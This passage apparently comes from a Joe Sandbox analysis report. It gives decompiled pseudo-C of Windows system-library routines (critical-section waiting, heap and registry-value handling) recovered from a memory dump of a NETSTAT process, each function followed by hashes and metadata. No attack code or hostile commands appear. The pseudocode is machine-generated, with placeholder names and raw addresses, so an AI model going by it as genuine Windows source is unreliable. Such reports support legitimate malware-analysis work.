                                      								if(0 != 0) {
                                      									__eflags = _v12 - 0xffffffff;
                                      									if(_v12 != 0xffffffff) {
                                      										_push(_v12);
                                      										E02EA95D0();
                                      									}
                                      								} else {
                                      									_t111 = _v12;
                                      								}
                                      								return _t111;
                                      							} else {
                                      								if(_t89 != 0) {
                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                      									_t77 = E02E87D50();
                                      									__eflags = _t77;
                                      									if(_t77 == 0) {
                                      										_t64 = 0x7ffe0384;
                                      									} else {
                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                      									}
                                      									__eflags =  *_t64;
                                      									if( *_t64 != 0) {
                                      										_t64 =  *[fs:0x30];
                                      										__eflags = _t64[0x240] & 0x00000004;
                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                      											_t78 = E02E87D50();
                                      											__eflags = _t78;
                                      											if(_t78 == 0) {
                                      												_t64 = 0x7ffe0385;
                                      											} else {
                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                      											}
                                      											__eflags =  *_t64 & 0x00000020;
                                      											if(( *_t64 & 0x00000020) != 0) {
                                      												_t64 = E02EE7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                      											}
                                      										}
                                      									}
                                      								}
                                      								return _t64;
                                      							}
                                      						}
                                      						_t97 = _t88;
                                      						_t93 = _t109;
                                      						E02EFFDDA(_t97, _v12);
                                      						_t105 =  *_t109;
                                      						_t67 = _v12 + 1;
                                      						_v12 = _t67;
                                      						__eflags = _t105 - 0xffffffff;
                                      						if(_t105 == 0xffffffff) {
                                      							_t106 = 0;
                                      							__eflags = 0;
                                      						} else {
                                      							_t106 =  *(_t105 + 0x14);
                                      						}
                                      						__eflags = _t67 - 2;
                                      						if(_t67 > 2) {
                                      							__eflags = _t109 - 0x2f55350;
                                      							if(_t109 != 0x2f55350) {
                                      								__eflags = _t106 - _v20;
                                      								if(__eflags == 0) {
                                      									_t93 = _t109;
                                      									E02EFFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                      								}
                                      							}
                                      						}
                                      						_push("RTL: Re-Waiting\n");
                                      						_push(0);
                                      						_push(0x65);
                                      						_v20 = _t106;
                                      						E02EF5720();
                                      						_t104 = _v28;
                                      						_t116 = _t116 + 0xc;
                                      						continue;
                                      					}
                                      				}
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Re-Waiting
                                      • API String ID: 0-316354757
                                      • Opcode ID: 1397bab6469fcc6d049dcdfc39216a820e481f5e73bd6f5c271272d5153eec2d
                                      • Instruction ID: 52c8b64ede669302a69b5cc0212ffd435d62f4ff4931f1f5548a869e24a142f8
                                      • Opcode Fuzzy Hash: 1397bab6469fcc6d049dcdfc39216a820e481f5e73bd6f5c271272d5153eec2d
                                      • Instruction Fuzzy Hash: 15614530AC06049BDB27DBA8C848BBFB7A5EF06358F14E666FA15976D0C7309900CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 80%
                                      			E02F30EA5(void* __ecx, void* __edx) {
                                      				signed int _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				unsigned int _v32;
                                      				signed int _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				intOrPtr _v64;
                                      				void* __ebx;
                                      				void* __edi;
                                      				signed int _t58;
                                      				unsigned int _t60;
                                      				intOrPtr _t62;
                                      				char* _t67;
                                      				char* _t69;
                                      				void* _t80;
                                      				void* _t83;
                                      				intOrPtr _t93;
                                      				intOrPtr _t115;
                                      				char _t117;
                                      				void* _t120;
                                      
                                      				_t83 = __edx;
                                      				_t117 = 0;
                                      				_t120 = __ecx;
                                      				_v44 = 0;
                                      				if(E02F2FF69(__ecx,  &_v44,  &_v32) < 0) {
                                      					L24:
                                      					_t109 = _v44;
                                      					if(_v44 != 0) {
                                      						E02F31074(_t83, _t120, _t109, _t117, _t117);
                                      					}
                                      					L26:
                                      					return _t117;
                                      				}
                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                      				_t5 = _t83 + 1; // 0x1
                                      				_v36 = _t5 << 0xc;
                                      				_v40 = _t93;
                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                      				asm("sbb ebx, ebx");
                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                      				if(_t58 != 0) {
                                      					_push(0);
                                      					_push(0x14);
                                      					_push( &_v24);
                                      					_push(3);
                                      					_push(_t93);
                                      					_push(0xffffffff);
                                      					_t80 = E02EA9730();
                                      					_t115 = _v64;
                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                      						_push(_t93);
                                      						E02F2A80D(_t115, 1, _v20, _t117);
                                      						_t83 = 4;
                                      					}
                                      				}
                                      				if(E02F2A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                      					goto L24;
                                      				}
                                      				_t60 = _v32;
                                      				_t97 = (_t60 != 0x100000) + 1;
                                      				_t83 = (_v44 -  *0x2f58b04 >> 0x14) + (_v44 -  *0x2f58b04 >> 0x14);
                                      				_v28 = (_t60 != 0x100000) + 1;
                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                      				_v40 = _t62;
                                      				if(_t83 >= _t62) {
                                      					L10:
                                      					asm("lock xadd [eax], ecx");
                                      					asm("lock xadd [eax], ecx");
                                      					if(E02E87D50() == 0) {
                                      						_t67 = 0x7ffe0380;
                                      					} else {
                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      					}
                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                      						E02F2138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                      					}
                                      					if(E02E87D50() == 0) {
                                      						_t69 = 0x7ffe0388;
                                      					} else {
                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                      					}
                                      					if( *_t69 != 0) {
                                      						E02F1FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                      					}
                                      					if(( *0x2f58724 & 0x00000008) != 0) {
                                      						E02F252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                      					}
                                      					_t117 = _v44;
                                      					goto L26;
                                      				}
                                      				while(E02F315B5(0x2f58ae4, _t83, _t97, _t97) >= 0) {
                                      					_t97 = _v28;
                                      					_t83 = _t83 + 2;
                                      					if(_t83 < _v40) {
                                      						continue;
                                      					}
                                      					goto L10;
                                      				}
                                      				goto L24;
                                      			}

























                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: b5d71bfa6e07a01f994aa213e46d40ebf5e43bcaacfeef3c26b5d031db6f7220
                                      • Instruction ID: 50c6ab7ba2628f74a5b213ce4adbf31d703a32b031a30ec184a93804e9dda91b
                                      • Opcode Fuzzy Hash: b5d71bfa6e07a01f994aa213e46d40ebf5e43bcaacfeef3c26b5d031db6f7220
                                      • Instruction Fuzzy Hash: 8D51C4716043419FD326DF28D880F1BB7E6EBC5784F04092DFA9A97290D771E805CB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 76%
                                      			E02E9F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char* _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v44;
                                      				char _v52;
                                      				intOrPtr _v56;
                                      				char _v60;
                                      				intOrPtr _v72;
                                      				void* _t51;
                                      				void* _t58;
                                      				signed short _t82;
                                      				short _t84;
                                      				signed int _t91;
                                      				signed int _t100;
                                      				signed short* _t103;
                                      				void* _t108;
                                      				intOrPtr* _t109;
                                      
                                      				_t103 = __ecx;
                                      				_t82 = __edx;
                                      				_t51 = E02E84120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                      				if(_t51 >= 0) {
                                      					_push(0x21);
                                      					_push(3);
                                      					_v56 =  *0x7ffe02dc;
                                      					_v20 =  &_v52;
                                      					_push( &_v44);
                                      					_v28 = 0x18;
                                      					_push( &_v28);
                                      					_push(0x100020);
                                      					_v24 = 0;
                                      					_push( &_v60);
                                      					_v16 = 0x40;
                                      					_v12 = 0;
                                      					_v8 = 0;
                                      					_t58 = E02EA9830();
                                      					_t87 =  *[fs:0x30];
                                      					_t108 = _t58;
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                      					if(_t108 < 0) {
                                      						L11:
                                      						_t51 = _t108;
                                      					} else {
                                      						_push(4);
                                      						_push(8);
                                      						_push( &_v36);
                                      						_push( &_v44);
                                      						_push(_v60);
                                      						_t108 = E02EA9990();
                                      						if(_t108 < 0) {
                                      							L10:
                                      							_push(_v60);
                                      							E02EA95D0();
                                      							goto L11;
                                      						} else {
                                      							_t18 = _t82 + 0x18; // 0x3f2bc81a
                                      							_t109 = L02E84620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                      							if(_t109 == 0) {
                                      								_t108 = 0xc0000017;
                                      								goto L10;
                                      							} else {
                                      								_t21 = _t109 + 0x18; // 0x18
                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                      								 *_t109 = 1;
                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                      								 *(_t109 + 0xe) = _t82;
                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                      								_t29 =  &(_t103[2]); // 0x20003f2b
                                      								E02EAF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                      								_t91 =  *_t103 & 0x0000ffff;
                                      								_t34 =  &(_t103[2]); // 0x20003f2b
                                      								_t100 = _t91 & 0xfffffffe;
                                      								_t84 = 0x5c;
                                      								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                      										_push(_v60);
                                      										E02EA95D0();
                                      										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                      										_t51 = 0xc0000106;
                                      									} else {
                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                      										goto L5;
                                      									}
                                      								} else {
                                      									L5:
                                      									 *_a4 = _t109;
                                      									_t51 = 0;
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t51;
                                      			}


























                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction ID: 41c20fdaa500a6c08ccbfd515e4f10119192e31949c95583a20a299faf2c7385
                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                      • Instruction Fuzzy Hash: 02518B71544710AFC320DF29C840A6BBBF9FF48714F00892EF99997690E7B4E944CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E02EE3540(intOrPtr _a4) {
                                      				signed int _v12;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				char _v96;
                                      				char _v352;
                                      				char _v1072;
                                      				intOrPtr _v1140;
                                      				intOrPtr _v1148;
                                      				char _v1152;
                                      				char _v1156;
                                      				char _v1160;
                                      				char _v1164;
                                      				char _v1168;
                                      				char* _v1172;
                                      				short _v1174;
                                      				char _v1176;
                                      				char _v1180;
                                      				char _v1192;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				short _t41;
                                      				short _t42;
                                      				intOrPtr _t80;
                                      				intOrPtr _t81;
                                      				signed int _t82;
                                      				void* _t83;
                                      
                                      				_v12 =  *0x2f5d360 ^ _t82;
                                      				_t41 = 0x14;
                                      				_v1176 = _t41;
                                      				_t42 = 0x16;
                                      				_v1174 = _t42;
                                      				_v1164 = 0x100;
                                      				_v1172 = L"BinaryHash";
                                      				_t81 = E02EA0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                      				if(_t81 < 0) {
                                      					L11:
                                      					_t75 = _t81;
                                      					E02EE3706(0, _t81, _t79, _t80);
                                      					L12:
                                      					if(_a4 != 0xc000047f) {
                                      						E02EAFA60( &_v1152, 0, 0x50);
                                      						_v1152 = 0x60c201e;
                                      						_v1148 = 1;
                                      						_v1140 = E02EE3540;
                                      						E02EAFA60( &_v1072, 0, 0x2cc);
                                      						_push( &_v1072);
                                      						E02EBDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                      						E02EF0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                      						_push(_v1152);
                                      						_push(0xffffffff);
                                      						E02EA97C0();
                                      					}
                                      					return E02EAB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                      				}
                                      				_t79 =  &_v352;
                                      				_t81 = E02EE3971(0, _a4,  &_v352,  &_v1156);
                                      				if(_t81 < 0) {
                                      					goto L11;
                                      				}
                                      				_t75 = _v1156;
                                      				_t79 =  &_v1160;
                                      				_t81 = E02EE3884(_v1156,  &_v1160,  &_v1168);
                                      				if(_t81 >= 0) {
                                      					_t80 = _v1160;
                                      					E02EAFA60( &_v96, 0, 0x50);
                                      					_t83 = _t83 + 0xc;
                                      					_push( &_v1180);
                                      					_push(0x50);
                                      					_push( &_v96);
                                      					_push(2);
                                      					_push( &_v1176);
                                      					_push(_v1156);
                                      					_t81 = E02EA9650();
                                      					if(_t81 >= 0) {
                                      						if(_v92 != 3 || _v88 == 0) {
                                      							_t81 = 0xc000090b;
                                      						}
                                      						if(_t81 >= 0) {
                                      							_t75 = _a4;
                                      							_t79 =  &_v352;
                                      							E02EE3787(_a4,  &_v352, _t80);
                                      						}
                                      					}
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                      				}
                                      				_push(_v1156);
                                      				E02EA95D0();
                                      				if(_t81 >= 0) {
                                      					goto L12;
                                      				} else {
                                      					goto L11;
                                      				}
                                      			}
































                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: BinaryHash
                                      • API String ID: 2994545307-2202222882
                                      • Opcode ID: 769be367ae93394bb556768594c316cc0e5d1e14d6275c4cee16f01e5e0983c9
                                      • Instruction ID: 68fdbdd858646468adad16faec29f8b8198e4713dad95cd50b856b770a7bc2f0
                                      • Opcode Fuzzy Hash: 769be367ae93394bb556768594c316cc0e5d1e14d6275c4cee16f01e5e0983c9
                                      • Instruction Fuzzy Hash: E84143F1D4052D9BDF21DA60CC81FEEB77DAB44718F0095E5AA09AB240DB319E88CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E02F305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                      				signed int _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				char _v32;
                                      				signed int _v36;
                                      				intOrPtr _v40;
                                      				void* __ebx;
                                      				void* _t35;
                                      				signed int _t42;
                                      				char* _t48;
                                      				signed int _t59;
                                      				signed char _t61;
                                      				signed int* _t79;
                                      				void* _t88;
                                      
                                      				_v28 = __edx;
                                      				_t79 = __ecx;
                                      				if(E02F307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                      					L13:
                                      					_t35 = 0;
                                      					L14:
                                      					return _t35;
                                      				}
                                      				_t61 = __ecx[1];
                                      				_t59 = __ecx[0xf];
                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                      				_v36 = _a8 << 0xc;
                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                      				asm("sbb esi, esi");
                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                      				if(_t42 != 0) {
                                      					_push(0);
                                      					_push(0x14);
                                      					_push( &_v24);
                                      					_push(3);
                                      					_push(_t59);
                                      					_push(0xffffffff);
                                      					if(E02EA9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                      						_push(_t61);
                                      						E02F2A80D(_t59, 1, _v20, 0);
                                      						_t88 = 4;
                                      					}
                                      				}
                                      				_t35 = E02F2A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                      				if(_t35 < 0) {
                                      					goto L14;
                                      				}
                                      				E02F31293(_t79, _v40, E02F307DF(_t79, _v28,  &_a4,  &_a8, 1));
                                      				if(E02E87D50() == 0) {
                                      					_t48 = 0x7ffe0380;
                                      				} else {
                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                      				}
                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                      					E02F2138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                      				}
                                      				goto L13;
                                      			}

















                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `
                                      • API String ID: 0-2679148245
                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction ID: 3effba9d14f0eae00abfe1d4b0f4e3a93e361e3f12a1b1b979e19af3e0d85123
                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                      • Instruction Fuzzy Hash: 13311332600355ABE711DE24CC44F9777DAAB84798F04422AFA58AB2C0DB70E904CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E02EE3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                      				char _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr* _v16;
                                      				char* _v20;
                                      				short _v22;
                                      				char _v24;
                                      				intOrPtr _t38;
                                      				short _t40;
                                      				short _t41;
                                      				void* _t44;
                                      				intOrPtr _t47;
                                      				void* _t48;
                                      
                                      				_v16 = __edx;
                                      				_t40 = 0x14;
                                      				_v24 = _t40;
                                      				_t41 = 0x16;
                                      				_v22 = _t41;
                                      				_t38 = 0;
                                      				_v12 = __ecx;
                                      				_push( &_v8);
                                      				_push(0);
                                      				_push(0);
                                      				_push(2);
                                      				_t43 =  &_v24;
                                      				_v20 = L"BinaryName";
                                      				_push( &_v24);
                                      				_push(__ecx);
                                      				_t47 = 0;
                                      				_t48 = E02EA9650();
                                      				if(_t48 >= 0) {
                                      					_t48 = 0xc000090b;
                                      				}
                                      				if(_t48 != 0xc0000023) {
                                      					_t44 = 0;
                                      					L13:
                                      					if(_t48 < 0) {
                                      						L16:
                                      						if(_t47 != 0) {
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                      						}
                                      						L18:
                                      						return _t48;
                                      					}
                                      					 *_v16 = _t38;
                                      					 *_a4 = _t47;
                                      					goto L18;
                                      				}
                                      				_t47 = L02E84620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                      				if(_t47 != 0) {
                                      					_push( &_v8);
                                      					_push(_v8);
                                      					_push(_t47);
                                      					_push(2);
                                      					_push( &_v24);
                                      					_push(_v12);
                                      					_t48 = E02EA9650();
                                      					if(_t48 < 0) {
                                      						_t44 = 0;
                                      						goto L16;
                                      					}
                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                      						_t48 = 0xc000090b;
                                      					}
                                      					_t44 = 0;
                                      					if(_t48 < 0) {
                                      						goto L16;
                                      					} else {
                                      						_t17 = _t47 + 0xc; // 0xc
                                      						_t38 = _t17;
                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                      							_t48 = 0xc000090b;
                                      						}
                                      						goto L13;
                                      					}
                                      				}
                                      				_t48 = _t48 + 0xfffffff4;
                                      				goto L18;
                                      			}















                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: BinaryName
                                      • API String ID: 2994545307-215506332
                                      • Opcode ID: eb85a246b4d650d64cfe9856ee0d331a842db37fad90c3563e6078a25dda6170
                                      • Instruction ID: c812652052fe3d07437f4256c1fbb009a8492ee71cd6d52d522ec05c12260daf
                                      • Opcode Fuzzy Hash: eb85a246b4d650d64cfe9856ee0d331a842db37fad90c3563e6078a25dda6170
                                      • Instruction Fuzzy Hash: F6312472980509BFDF15DA58C941E7BB774EF90724F11D1A9AD1AA7280D7319E00CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 33%
                                      			E02E9D294(void* __ecx, char __edx, void* __eflags) {
                                      				signed int _v8;
                                      				char _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				intOrPtr _v64;
                                      				char* _v68;
                                      				intOrPtr _v72;
                                      				char _v76;
                                      				signed int _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				char _v104;
                                      				char _v105;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t35;
                                      				char _t38;
                                      				signed int _t40;
                                      				signed int _t44;
                                      				signed int _t52;
                                      				void* _t53;
                                      				void* _t55;
                                      				void* _t61;
                                      				intOrPtr _t62;
                                      				void* _t64;
                                      				signed int _t65;
                                      				signed int _t66;
                                      
                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                      				_v8 =  *0x2f5d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                      				_v105 = __edx;
                                      				_push( &_v92);
                                      				_t52 = 0;
                                      				_push(0);
                                      				_push(0);
                                      				_push( &_v104);
                                      				_push(0);
                                      				_t59 = __ecx;
                                      				_t55 = 2;
                                      				if(E02E84120(_t55, __ecx) < 0) {
                                      					_t35 = 0;
                                      					L8:
                                      					_pop(_t61);
                                      					_pop(_t64);
                                      					_pop(_t53);
                                      					return E02EAB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                      				}
                                      				_v96 = _v100;
                                      				_t38 = _v92;
                                      				if(_t38 != 0) {
                                      					_v104 = _t38;
                                      					_v100 = _v88;
                                      					_t40 = _v84;
                                      				} else {
                                      					_t40 = 0;
                                      				}
                                      				_v72 = _t40;
                                      				_v68 =  &_v104;
                                      				_push( &_v52);
                                      				_v76 = 0x18;
                                      				_push( &_v76);
                                      				_v64 = 0x40;
                                      				_v60 = _t52;
                                      				_v56 = _t52;
                                      				_t44 = E02EA98D0();
                                      				_t62 = _v88;
                                      				_t65 = _t44;
                                      				if(_t62 != 0) {
                                      					asm("lock xadd [edi], eax");
                                      					if((_t44 | 0xffffffff) != 0) {
                                      						goto L4;
                                      					}
                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                      					E02EA95D0();
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                      					goto L4;
                                      				} else {
                                      					L4:
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                      					if(_t65 >= 0) {
                                      						_t52 = 1;
                                      					} else {
                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                      						}
                                      					}
                                      					_t35 = _t52;
                                      					goto L8;
                                      				}
                                      			}

































                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 190299b192dce47669d4ec4f258b058fcbbd33f1cd5a6ca276c6b1f314d4dda3
                                      • Instruction ID: c4fb895bd8fa647d7567e67cf47203a449f5c4989f827488111c15cdf4895f76
                                      • Opcode Fuzzy Hash: 190299b192dce47669d4ec4f258b058fcbbd33f1cd5a6ca276c6b1f314d4dda3
                                      • Instruction Fuzzy Hash: DA31B3B15883159FC711EF28C980AAFBBE8EB85754F00592EF99883210D734DD04CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E02E71B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				intOrPtr* _t26;
                                      				intOrPtr _t29;
                                      				void* _t30;
                                      				signed int _t31;
                                      
                                      				_t27 = __ecx;
                                      				_t29 = __edx;
                                      				_t31 = 0;
                                      				_v8 = __edx;
                                      				if(__edx == 0) {
                                      					L18:
                                      					_t30 = 0xc000000d;
                                      					goto L12;
                                      				} else {
                                      					_t26 = _a4;
                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                      						goto L18;
                                      					} else {
                                      						E02EABB40(__ecx,  &_v16, __ecx);
                                      						_push(_t26);
                                      						_push(0);
                                      						_push(0);
                                      						_push(_t29);
                                      						_push( &_v16);
                                      						_t30 = E02EAA9B0();
                                      						if(_t30 >= 0) {
                                      							_t19 =  *_t26;
                                      							if( *_t26 != 0) {
                                      								goto L7;
                                      							} else {
                                      								 *_a8 =  *_a8 & 0;
                                      							}
                                      						} else {
                                      							if(_t30 != 0xc0000023) {
                                      								L9:
                                      								_push(_t26);
                                      								_push( *_t26);
                                      								_push(_t31);
                                      								_push(_v8);
                                      								_push( &_v16);
                                      								_t30 = E02EAA9B0();
                                      								if(_t30 < 0) {
                                      									L12:
                                      									if(_t31 != 0) {
                                      										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                      									}
                                      								} else {
                                      									 *_a8 = _t31;
                                      								}
                                      							} else {
                                      								_t19 =  *_t26;
                                      								if( *_t26 == 0) {
                                      									_t31 = 0;
                                      								} else {
                                      									L7:
                                      									_t31 = L02E84620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                      								}
                                      								if(_t31 == 0) {
                                      									_t30 = 0xc0000017;
                                      								} else {
                                      									goto L9;
